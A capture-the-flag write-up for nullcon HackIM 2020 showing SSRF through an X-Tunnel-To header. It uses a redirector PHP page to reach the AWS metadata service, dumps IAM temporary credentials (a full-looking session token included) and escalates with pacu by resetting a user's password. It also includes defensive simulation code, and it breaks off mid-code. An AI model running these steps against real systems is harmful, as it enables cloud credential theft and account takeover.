nullcon HackIM 2020 Writeup - Lateral Movement
Question
Uncover the new path. http://3.12.166.246:3000/ Note: no need to bruteforce tenant. The tenant can be any string.

Solution
Stage1
Visiting the URL shows a rich UI, but the page itself is static.
Looking at the buildActionRequest function in script.js, we find that a path /api/1/ exists.
function buildActionRequest(tenant, tag, typ, action, options) {
  var path;
  var request;
  path = "/api/1/";
  if (tenant && tag) path += tenant + tag + "/";
  path += typ + "?action\x3d" + action;   // "\x3d" is "="
  request = {
    protocol: this.context.protocol,
    hostname: this.context.hostname,
    port: this.context.port,
    path: path,
    method: "POST",
    headers: {
      "Accept": "application/json",
      "Content-type": "application/json",
    }
  };
  if (this.context.authToken) request.headers.Authorization = this.context.authToken;
  // The server forwards the request to whatever host this header names
  if (this.context.tunnelTo) request.headers["X-Tunnel-To"] = this.context.tunnelTo;
  if (options) {
    if (options.headers) Object.keys(options.headers).forEach(function(k) {
      if (options.headers[k]) request.headers[k] = options.headers[k];
      else delete request.headers[k]
    });
    if (options.method) request.method = options.method;
    if (options.path) request.path = options.path;
    if (options.data) request.data = options.data
  }
  return request
}
Set the HTTP headers that appear in it and try issuing an HTTP request.
root@kali:~# curl -H 'X-Tunnel-To: hoge' -H 'Content-Type: application/json' -H 'Accept: application/json' 'http://3.12.166.246:3000/api/1/aaa?action=bbb' -d '{"ccc":"ddd"}'
{"errno":-3008,"code":"ENOTFOUND","syscall":"getaddrinfo","hostname":"hoge"}
Changing X-Tunnel-To changes the response: the request is apparently forwarded to the hostname given in the header.
root@kali:~# curl -H 'X-Tunnel-To: localhost' -H 'Content-Type: application/json' -H 'Accept: application/json' 'http://3.12.166.246:3000/api/1/aaa?action=bbb' -d '{"ccc":"ddd"}'
Not permitted!
root@kali:~# curl -H 'X-Tunnel-To: example.com' -H 'Content-Type: application/json' -H 'Accept: application/json' 'http://3.12.166.246:3000/api/1/aaa?action=bbb' -d '{"ccc":"ddd"}'
<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>404 - Not Found</title>
</head>
<body>
<h1>404 - Not Found</h1>
<script type="text/javascript" src="//wpc.75674.betacdn.net/0075674/www/ec_tpm_bcon.js"></script>
</body>
</html>
The hint "Move laterally within the cloud." points at the AWS instance metadata service.
However, specifying 169.254.169.254, the instance metadata endpoint, in X-Tunnel-To is blocked.
root@kali:~# curl -H 'X-Tunnel-To: 169.254.169.254' -H 'Content-Type: application/json' -H 'Accept: application/json' 'http://3.12.166.246:3000/api/1/aaa?action=bbb' -d '{"ccc":"ddd"}'
So smart, But still Internal not permitted!
So instead we make the tunnel reach 169.254.169.254 through a redirect.
First, put a page on our own server that answers with a 303 redirect to 169.254.169.254. (A 302 was rejected.)
root@ip-172-31-26-179:~# cat /var/www/html/api/1/metadata.php
<?php header('Location: http://169.254.169.254/'.$_GET["q"], TRUE, 303); ?>
Specifying our own server's hostname in X-Tunnel-To returns the instance metadata.
root@ip-172-31-26-179:~# curl -H 'X-Tunnel-To: <attacker-server>' 'http://3.12.166.246:3000/api/1/metadata.php'
1.0
2007-01-19
2007-03-01
2007-08-29
2007-10-10
2007-12-15
2008-02-01
2008-09-01
2009-04-04
2011-01-01
2011-05-01
2012-01-12
2014-02-25
2014-11-05
2015-10-20
2016-04-19
2016-06-30
2016-09-02
2018-03-28
2018-08-17
2018-09-24
latest
Now fetch temporary access keys that act with the permissions of limited-role, the IAM role attached to the EC2 instance.
root@ip-172-31-26-179:~# curl -H 'X-Tunnel-To: <attacker-server>' 'http://3.12.166.246:3000/api/1/metadata.php?q=latest/meta-data/iam/security-credentials/limited-role'
{
"Code" : "Success",
"LastUpdated" : "2020-02-08T14:39:41Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "ASIATCUSO7XXPHMSQ3XC",
"SecretAccessKey" : "YnHSOXfK1L06PVYJ(snip)",
"Token" : "(snip)",
"Expiration" : "2020-02-08T20:39:42Z"
}
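What the 303 trick exploits is the combination of two behaviours: the service applies its denylist to the X-Tunnel-To value (localhost, 169.254.169.254), then follows whatever redirect the upstream returns without checking again. The simulation below is an added example written for this write-up, not code from the challenge: it models the tunnel with an in-memory DNS table and canned responses (all constructed; example.com, attacker.example, the addresses and the credential body are assumptions) and shows the same request succeeding against a proxy that checks only the header value and failing against one that re-applies the denylist to every redirect hop. The 302-versus-303 difference the author observed is not modelled.

```python
import ipaddress
from urllib.parse import urlsplit, urljoin

# Constructed stand-in for getaddrinfo(); the names and addresses are assumptions.
DNS = {
    "example.com": "93.184.216.34",
    "attacker.example": "203.0.113.10",
    "localhost": "127.0.0.1",
}

# Address ranges the tunnel must never reach: loopback, RFC 1918, link-local
# (169.254.169.254 is the IMDS endpoint), CGNAT, "this network", and the IPv6
# equivalents; fc00::/7 covers fd00:ec2::254, the IMDS IPv6 endpoint.
DENY_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
    "169.254.0.0/16", "100.64.0.0/10", "0.0.0.0/8",
    "::1/128", "fc00::/7", "fe80::/10",
)]

# Constructed responses keyed by (host, path-with-query) -> (status, headers, body).
# The attacker.example entry behaves like the 303 redirector PHP in the write-up.
CRED_PATH = "/latest/meta-data/iam/security-credentials/limited-role"
RESPONSES = {
    ("attacker.example", "/api/1/metadata.php?q=" + CRED_PATH.lstrip("/")):
        (303, {"Location": "http://169.254.169.254" + CRED_PATH}, ""),
    ("169.254.169.254", CRED_PATH):
        (200, {}, '{"Code": "Success", "AccessKeyId": "ASIA-CONSTRUCTED"}'),
    ("example.com", "/api/1/aaa?action=bbb"):
        (404, {}, "404 - Not Found"),
}


def resolve(host):
    """Return the address the tunnel would connect to, or None if unresolvable."""
    try:
        return ipaddress.ip_address(host)          # IP literal
    except ValueError:
        addr = DNS.get(host)
        return ipaddress.ip_address(addr) if addr else None


def is_internal(host):
    """True if the host must not be proxied to. Unresolvable names fail closed."""
    if host is None or host.lower() == "localhost":
        return True
    ip = resolve(host)
    return ip is None or any(ip in net for net in DENY_NETS)


def fetch(url):
    """Look the URL up in the canned response table (no network)."""
    p = urlsplit(url)
    key = (p.hostname, p.path + ("?" + p.query if p.query else ""))
    return RESPONSES.get(key, (404, {}, "404 - Not Found"))


def tunnel(tunnel_to, path, recheck_each_hop, max_hops=5):
    """Simulate the X-Tunnel-To proxy. recheck_each_hop=False applies the
    denylist only to the header value (the challenge's behaviour); True
    re-applies it to every redirect target before following it."""
    if is_internal(tunnel_to):
        return 403, "Not permitted!"
    url = "http://%s%s" % (tunnel_to, path)
    for _ in range(max_hops):
        status, headers, body = fetch(url)
        if status not in (301, 302, 303, 307, 308):
            return status, body
        url = urljoin(url, headers["Location"])      # follow the redirect
        if recheck_each_hop and is_internal(urlsplit(url).hostname):
            return 403, "Not permitted!"
    return 508, "Too many redirects"


if __name__ == "__main__":
    attack = "/api/1/metadata.php?q=" + CRED_PATH.lstrip("/")
    print("header-only check:", tunnel("attacker.example", attack, False))
    print("per-hop check:    ", tunnel("attacker.example", attack, True))
```

In a real proxy, resolve the name once, check the address, and connect to that address rather than to the name, otherwise a DNS answer that changes between check and connect passes the test and still lands on 169.254.169.254. Independently of the proxy, IMDSv2 requires a PUT with the X-aws-ec2-metadata-token-ttl-seconds header before any metadata GET, which a redirect-following tunnel cannot produce, so enabling it on the instance closes this path as well.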
Stage2
Using the obtained access keys together with pacu, a penetration-testing tool for AWS, we gather information and move laterally.
Install it following its instructions and start it.
root@kali:~/pacu# python3 pacu.py
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣶⣿⣿⣿⣿⣿⣿⣶⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⡿⠛⠉⠁⠀⠀⠈⠙⠻⣿⣿⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠛⠛⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠻⣿⣷⣀⣀⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣤⣤⣤⣤⣤⣤⣤⣤⣀⣀⠀⠀⠀⠀⠀⠀⢻⣿⣿⣿⡿⣿⣿⣷⣦⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣀⣈⣉⣙⣛⣿⣿⣿⣿⣿⣿⣿⣿⡟⠛⠿⢿⣿⣷⣦⣄⠀⠀⠈⠛⠋⠀⠀⠀⠈⠻⣿⣷⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣀⣈⣉⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⣀⣀⣀⣤⣿⣿⣿⣷⣦⡀⠀⠀⠀⠀⠀⠀⠀⣿⣿⣆⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⢀⣀⣬⣭⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⢛⣉⣉⣡⣄⠀⠀⠀⠀⠀⠀⠀⠀⠻⢿⣿⣿⣶⣄⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣁⣤⣶⡿⣿⣿⠉⠻⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢻⣿⣧⡀
⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠋⣠⣶⣿⡟⠻⣿⠃⠈⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢹⣿⣧
⢀⣀⣤⣴⣶⣶⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠁⢠⣾⣿⠉⠻⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿
⠉⠛⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀⠀⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⡟
⠀⠀⠀⠀⠉⣻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⣾⣿⡟⠁
⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⣄⡀⠀⠀⠀⠀⠀⣴⣆⢀⣴⣆⠀⣼⣆⠀⠀⣶⣶⣶⣶⣶⣶⣶⣶⣾⣿⣿⠿⠋⠀⠀
⠀⠀⠀⣼⣿⣿⣿⠿⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠛⠓⠒⠒⠚⠛⠛⠛⠛⠛⠛⠛⠛⠀⠀⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠀⠀⠀⠀⠀
⠀⠀⠀⣿⣿⠟⠁⠀⢸⣿⣿⣿⣿⣿⣿⣿⣶⡀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣷⡄⠀⢀⣾⣿⣿⣿⣿⣿⣿⣷⣆⠀⢰⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠘⠁⠀⠀⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢿⣿⣿⡇⠀⢸⣿⣿⡿⠛⠛⢻⣿⣿⣿⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠸⠿⠿⠟⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⣧⣤⣤⣼⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⡿⠃⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⡇⠀⢸⣿⣿⡇⠀⠀⢀⣀⣀⣀⠀⢸⣿⣿⣿⠀⠀⠀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡏⠉⠉⠉⠉⠀⠀⠀⢸⣿⣿⡏⠉⠉⢹⣿⣿⡇⠀⢸⣿⣿⣇⣀⣀⣸⣿⣿⣿⠀⢸⣿⣿⣿⣀⣀⣀⣿⣿⣿
⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⢸⣿⣿⡇⠀⠸⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⡟
⠀⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠀⠀⠀⠀⠀⠘⠛⠛⠃⠀⠀⠘⠛⠛⠃⠀⠀⠉⠛⠛⠛⠛⠛⠛⠋⠀⠀⠀⠀⠙⠛⠛⠛⠛⠛⠉⠀
No database found at /root/pacu/sqlite.db
Database created at /root/pacu/sqlite.db
What would you like to name this new session? hackim
Session hackim created.
Pacu - https://github.com/RhinoSecurityLabs/pacu
Written and researched by Spencer Gietzen of Rhino Security Labs - https://rhinosecuritylabs.com/
This was built as a modular, open source tool to assist in penetration testing an AWS environment.
For usage and developer documentation, please visit the GitHub page.
Modules that have pre-requisites will have those listed in that modules help info, but if it is
executed before its pre-reqs have been filled, it will prompt you to run that module then continue
once that is finished, so you have the necessary data for the module you want to run.
Pacu command info:
list/ls List all modules
load_commands_file <file> Load an existing file with list of commands to execute
search [cat[egory]] <search term> Search the list of available modules by name or category
help Display this page of information
help <module name> Display information about a module
whoami Display information regarding to the active access keys
data Display all data that is stored in this session. Only fields
with values will be displayed
data <service>|proxy Display all data for a specified service or for PacuProxy
in this session
services Display a list of services that have collected data in the
current session to use with the "data" command
regions Display a list of all valid AWS regions
update_regions Run a script to update the regions database to the newest
version
set_regions <region> [<region>...] Set the default regions for this session. These space-separated
regions will be used for modules where regions are required,
but not supplied by the user. The default set of regions is
every supported region for the service. Supply "all" to this
command to reset the region set to the default of all
supported regions
run/exec <module name> Execute a module
set_keys Add a set of AWS keys to the session and set them as the
default
swap_keys Change the currently active AWS key to another key that has
previously been set for this session
import_keys <profile name>|--all Import AWS keys from the AWS CLI credentials file (located
at ~/.aws/credentials) to the current sessions database.
Enter the name of a profile you would like to import or
supply --all to import all the credentials in the file.
exit/quit Exit Pacu
Other command info:
aws <command> Run an AWS CLI command directly. Note: If Pacu detects "aws"
as the first word of the command, the whole command will
instead be run in a shell so that you can use the AWS CLI
from within Pacu. Due to the command running in a shell,
this enables you to pipe output where needed. An example
would be to run an AWS CLI command and pipe it into "jq"
to parse the data returned. Warning: The AWS CLI's
authentication is not related to Pacu. Be careful to
ensure that you are using the keys you want when using
the AWS CLI. It is suggested to use AWS CLI profiles
to solve this problem
[ADVANCED] PacuProxy command info:
proxy [help] Control PacuProxy/display help
start <ip> [port] Start the PacuProxy listener - port 80 by default.
The listener will attempt to start on the IP
supplied, but some hosts don't allow this. In
this case, PacuProxy will listen on 0.0.0.0 and
use the supplied IP to stage agents and it should
work the same
stop Stop the PacuProxy listener
kill <agent_id> Kill an agent (stop it from running on the host)
list/ls List info on remote agent(s)
use none|<agent_id> Use a remote agent, identified by unique integers
(use "proxy list" to see them). Choose "none" to
no longer use any proxy (route from the local
host instead)
shell <agent_id> <command> Run a shell command on the remote agent
fetch_ec2_keys <agent_id> Try to read the meta-data of the target agent to
request a set of temporary credentials for the
attached instance profile (if there is one),
then save them to the Pacu database and set
them as the active key pair
stager sh|ps Generate a PacuProxy stager. The "sh" format is
for *sh shells in Unix (like bash), and the "ps"
format is for PowerShell on Windows
Detected environment as one of Kali/Parrot/Pentoo Linux. Modifying user agent to hide that from GuardDuty...
User agent for this session set to:
aws-cli/1.15.10 Python/2.7.9 Windows/8 botocore/1.10.10
Set the credentials obtained from the instance metadata.
Pacu (hackim:No Keys Set) > set_keys
Setting AWS Keys...
Press enter to keep the value currently stored.
Enter the letter C to clear the value, rather than set it.
If you enter an existing key_alias, that key's fields will be updated instead of added.
Key alias [None]: limited-role
Access key ID [None]: ASIATCUSO7XXPHMSQ3XC
Secret access key [None]: YnHSOXfK1L06PVYJ(snip)
Session token (Optional - for temp AWS keys only) [None]: IQoJb3JpZ2luX2VjEC8aCXVzLWVhc3QtMiJHMEUCIQDAF8T+X3zFRfBeNrFz8qeG66VZMerjIO2UrpjZC0c5VwIgdI9iR9VVbT2db7ppnZxj3mE7yBPbvzXqAUCa/v4l/coqvQMI2P//////////ARAAGgwyMTE4MzQzMDYwMzAiDHhVCl2VO7silpXomiqRA4XolMzX5R5MwDD5gg5diaM1jjvsWq+0uJrzpg/l7ULAScCnp18v2I0SdyDb0TmERoGhgP3o2g2gHAtqZgVEDQe//1wG3DBeQ+GLmplMbpgs3+cZcqhKBG5CmMwusCBNTbiJTlkHzYe5bExR24YschWAmVnU+GSoBSvvQiIanJyV8ALDnvjt/5E8y6gnWm/KCCxjTaGwL3JormkaHWxCnEo/ayt+NY6+dZwe4z5+0UnhxokBvyCQDISPRH4zwLJNUiZ/whyTyQIsn1DDFicNQlUngWl3Ek0uvqBp/JtKSVpMRlF5j5jdE3rAnBoqF6nvfUlYl7LRVONfNw0rK6L0NdKSBtrXhBtdJuz5ZWVxBiB4z3V6ieoNzUGti9ivRAGPevsRtWkH3jXItJQEgJ9NbQEJCmj5VrYZs+SFHi347P/xjYHjzHNT/NWjPxMNemSb94JaKqb90hFjqgF9CkFgtq4q7R2pSlKy/H3UXwkE5bYuAI+DjtaTNz6KPSYLY16ReGGknhqy6D3v/quDMHmF/6mkMKmQ+/EFOusBN5piQfRQKrwm862otyDB1HTKTtUdSAj9y/ACwcN6LUAZBQdXwMyL5QWMWk6j30LUl1ODHg1MtpydMNbVdwYM3jSZLSPgmAsD6QW6/jB/ECdAWsnBgNH7VvmccAZtuFFlYFh+zJmaTkYHFMMAkPG17oWDfJO0ofZlFq99DxuJ4OZDnp47zxEEN9C2vLcEBRV6644pbK4qo9e3ZLS1vy0zMJEd6wLcU4G3U3HFz0xfyANMV2d+m0ps+66WJb1nSr/xY8JxFAPrn24ehFdeDbsSJdMEI7mYjssrsinBjPwNCOIGE/TEjMPofVzvpQ==
Keys saved to database.
Retrieve the IAM-related information with iam__enum_users_roles_policies_groups.
Pacu (hackim:limited-role) > run iam__enum_users_roles_policies_groups
Running module iam__enum_users_roles_policies_groups...
[iam__enum_users_roles_policies_groups] Found 1 users
[iam__enum_users_roles_policies_groups] Found 3 roles
[iam__enum_users_roles_policies_groups] Found 3 policies
[iam__enum_users_roles_policies_groups] Found 3 groups
[iam__enum_users_roles_policies_groups] iam__enum_users_roles_policies_groups completed.
[iam__enum_users_roles_policies_groups] MODULE SUMMARY:
1 Users Enumerated
3 Roles Enumerated
3 Policies Enumerated
3 Groups Enumerated
IAM resources saved in Pacu database.
Display the IAM information that was collected.
Pacu (hackim:limited-role) > data
Session data:
aws_keys: [
<AWSKey: limited-role>
]
id: 1
created: "2020-02-08 15:10:24.095578"
is_active: true
name: "hackim"
boto_user_agent: "aws-cli/1.15.10 Python/2.7.9 Windows/8 botocore/1.10.10"
key_alias: "limited-role"
access_key_id: "ASIATCUSO7XXPHMSQ3XC"
secret_access_key: "******" (Censored)
session_token: "(snip)"
session_regions: [
"all"
]
IAM: {
"Users": [
{
"Path": "/",
"UserName": "poorUser",
"UserId": "AIDATCUSO7XXPAUMHXSZ2",
"Arn": "arn:aws:iam::211834306030:user/poorUser",
"CreateDate": "Thu, 23 Jan 2020 15:42:45",
"PasswordLastUsed": "Sat, 08 Feb 2020 14:12:41"
}
],
"Roles": [
{
"Path": "/aws-service-role/support.amazonaws.com/",
"RoleName": "AWSServiceRoleForSupport",
"RoleId": "AROATCUSO7XXKU7K6BBJM",
"Arn": "arn:aws:iam::211834306030:role/aws-service-role/support.amazonaws.com/AWSServiceRoleForSupport",
"CreateDate": "Thu, 23 Jan 2020 11:20:05",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "support.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Enables resource access for AWS to provide billing, administrative and support services",
"MaxSessionDuration": 3600
},
{
"Path": "/aws-service-role/trustedadvisor.amazonaws.com/",
"RoleName": "AWSServiceRoleForTrustedAdvisor",
"RoleId": "AROATCUSO7XXCDG4HOBDW",
"Arn": "arn:aws:iam::211834306030:role/aws-service-role/trustedadvisor.amazonaws.com/AWSServiceRoleForTrustedAdvisor",
"CreateDate": "Thu, 23 Jan 2020 11:20:05",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "trustedadvisor.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Access for the AWS Trusted Advisor Service to help reduce cost, increase performance, and improve security of your AWS environment.",
"MaxSessionDuration": 3600
},
{
"Path": "/",
"RoleName": "limited-role",
"RoleId": "AROATCUSO7XXK6KY3Y54E",
"Arn": "arn:aws:iam::211834306030:role/limited-role",
"CreateDate": "Thu, 23 Jan 2020 16:16:29",
"AssumeRolePolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "ec2.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
},
"Description": "Allows EC2 instances to call AWS services on your behalf.",
"MaxSessionDuration": 3600
}
],
"Policies": [
{
"PolicyName": "limited-role-2",
"PolicyId": "ANPATCUSO7XXEQI2GQ6A6",
"Arn": "arn:aws:iam::211834306030:policy/limited-role-2",
"Path": "/",
"DefaultVersionId": "v11",
"AttachmentCount": 2,
"IsAttachable": true,
"CreateDate": "Sat, 08 Feb 2020 07:15:23",
"UpdateDate": "Sat, 08 Feb 2020 07:50:32"
},
{
"PolicyName": "limiteds3",
"PolicyId": "ANPATCUSO7XXJVJ3W23VX",
"Arn": "arn:aws:iam::211834306030:policy/limiteds3",
"Path": "/",
"DefaultVersionId": "v1",
"IsAttachable": true,
"CreateDate": "Thu, 23 Jan 2020 21:20:26",
"UpdateDate": "Thu, 23 Jan 2020 21:20:26"
},
{
"PolicyName": "limited",
"PolicyId": "ANPATCUSO7XXKNAARZWEA",
"Arn": "arn:aws:iam::211834306030:policy/limited",
"Path": "/",
"DefaultVersionId": "v12",
"AttachmentCount": 1,
"IsAttachable": true,
"CreateDate": "Thu, 23 Jan 2020 15:40:20",
"UpdateDate": "Sat, 08 Feb 2020 07:11:05"
}
],
"Groups": [
{
"Path": "/",
"GroupName": "limited2",
"GroupId": "AGPATCUSO7XXM4A7JKWKI",
"Arn": "arn:aws:iam::211834306030:group/limited2",
"CreateDate": "Sat, 08 Feb 2020 07:16:17"
},
{
"Path": "/",
"GroupName": "limiteds3g",
"GroupId": "AGPATCUSO7XXCJPDNISWZ",
"Arn": "arn:aws:iam::211834306030:group/limiteds3g",
"CreateDate": "Thu, 23 Jan 2020 21:21:19"
},
{
"Path": "/",
"GroupName": "priv",
"GroupId": "AGPATCUSO7XXIZJZ6F56S",
"Arn": "arn:aws:iam::211834306030:group/priv",
"CreateDate": "Thu, 23 Jan 2020 15:40:53"
}
]
}
Proxy data:
{
"IP": "0.0.0.0",
"Port": 80,
"Listening": false,
"SSHUsername": "",
"SSHPassword": "",
"TargetAgent": []
}
This tells us the AWS account ID is 211834306030 and that there is an IAM user named poorUser.
Running iam__privesc_scan to look for ways to escalate to other principals shows that the limited-role role is allowed the iam:UpdateLoginProfile action. With iam:UpdateLoginProfile you can set another IAM user's console password, so we change poorUser's password.
Pacu (hackim:limited-role) > run iam__privesc_scan
Running module iam__privesc_scan...
[iam__privesc_scan] No permissions detected yet.
[iam__privesc_scan] Data (Current User/Role > Permissions) not found, run module "iam__enum_permissions" to fetch it? (y/n) y
[iam__privesc_scan] Running module iam__enum_permissions...
[iam__enum_permissions] Confirming permissions for roles:
[iam__enum_permissions] limited-role...
[iam__enum_permissions] Confirmed permissions for limited-role
[iam__enum_permissions] iam__enum_permissions completed.
[iam__enum_permissions] MODULE SUMMARY:
Confirmed permissions for 0 user(s).
Confirmed permissions for role: limited-role.
[iam__privesc_scan] Escalation methods for current role:
[iam__privesc_scan] CONFIRMED: UpdateLoginProfile
[iam__privesc_scan] Attempting confirmed privilege escalation methods...
[iam__privesc_scan] Starting method UpdateLoginProfile...
[iam__privesc_scan] Is there a specific user you want to target? They must already have a login profile (password for logging into the AWS Console). Enter their user name now or just hit enter to enumerate users and view a list of options:
[iam__privesc_scan] Found 1 user(s). Choose a user below.
[iam__privesc_scan] [0] Other (Manually enter user name)
[iam__privesc_scan] [1] All Users
[iam__privesc_scan] [2] poorUser
[iam__privesc_scan] Choose an option: 2
[iam__privesc_scan] Running module iam__backdoor_users_password...
[iam__backdoor_users_password] Modifying an IAM user's current password
[iam__backdoor_users_password] User: poorUser
[iam__backdoor_users_password] Password successfully changed
[iam__backdoor_users_password] Password: hqw.yE.a##CfW$V3q"npK_"k"/=&d*4UV0MSItR{(ueW}Gd0[(snip)
[iam__backdoor_users_password] iam__backdoor_users_password completed.
[iam__backdoor_users_password] MODULE SUMMARY:
1 user(s) backdoored.
[iam__privesc_scan] iam__privesc_scan completed.
[iam__privesc_scan] MODULE SUMMARY:
Privilege escalation was successful
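iam__privesc_scan works by comparing the confirmed permissions of the current principal against a catalogue of action combinations known to allow escalation. The following is an added example, not pacu's code and not the challenge's real policy (the write-up never shows limited-role's policy document, so LIMITED_ROLE_LIKE is a constructed policy that merely grants what the scan confirmed plus the read access the enumeration needed): a reduced version of that matching, honouring IAM wildcards and explicit Deny, which is enough to reproduce the CONFIRMED: UpdateLoginProfile verdict above.

```python
import fnmatch

# Privilege-escalation primitives checked here (a subset of those pacu's
# iam__privesc_scan knows); each maps to the actions it requires.
PRIVESC_METHODS = {
    "UpdateLoginProfile": ["iam:UpdateLoginProfile"],
    "CreateLoginProfile": ["iam:CreateLoginProfile"],
    "CreateAccessKey": ["iam:CreateAccessKey"],
    "AttachUserPolicy": ["iam:AttachUserPolicy"],
    "CreatePolicyVersion": ["iam:CreatePolicyVersion"],
    "PassRoleToEC2": ["iam:PassRole", "ec2:RunInstances"],
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def allowed_actions(policies, candidates):
    """Subset of `candidates` that some statement Allows and none Denies.
    Action patterns are matched case-insensitively with IAM-style wildcards
    ("iam:*", "iam:Update*"). Resource and Condition are ignored and
    NotAction statements are skipped, so this is a first-pass approximation
    rather than a full IAM policy evaluator (an assumption of this example)."""
    allowed, denied = set(), set()
    for doc in policies:
        for stmt in _as_list(doc.get("Statement", [])):
            if "Action" not in stmt:
                continue
            patterns = [p.lower() for p in _as_list(stmt["Action"])]
            bucket = allowed if stmt.get("Effect") == "Allow" else denied
            for action in candidates:
                if any(fnmatch.fnmatchcase(action.lower(), p) for p in patterns):
                    bucket.add(action)
    return allowed - denied


def privesc_methods(policies):
    """Names of PRIVESC_METHODS whose every required action is granted."""
    needed = sorted({a for acts in PRIVESC_METHODS.values() for a in acts})
    have = allowed_actions(policies, needed)
    return sorted(name for name, acts in PRIVESC_METHODS.items()
                  if all(a in have for a in acts))


# Constructed policy document: what limited-role plausibly had, given the
# enumeration succeeded and the scan confirmed only UpdateLoginProfile.
LIMITED_ROLE_LIKE = [{
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["iam:Get*", "iam:List*"], "Resource": "*"},
        {"Effect": "Allow", "Action": "iam:UpdateLoginProfile", "Resource": "*"},
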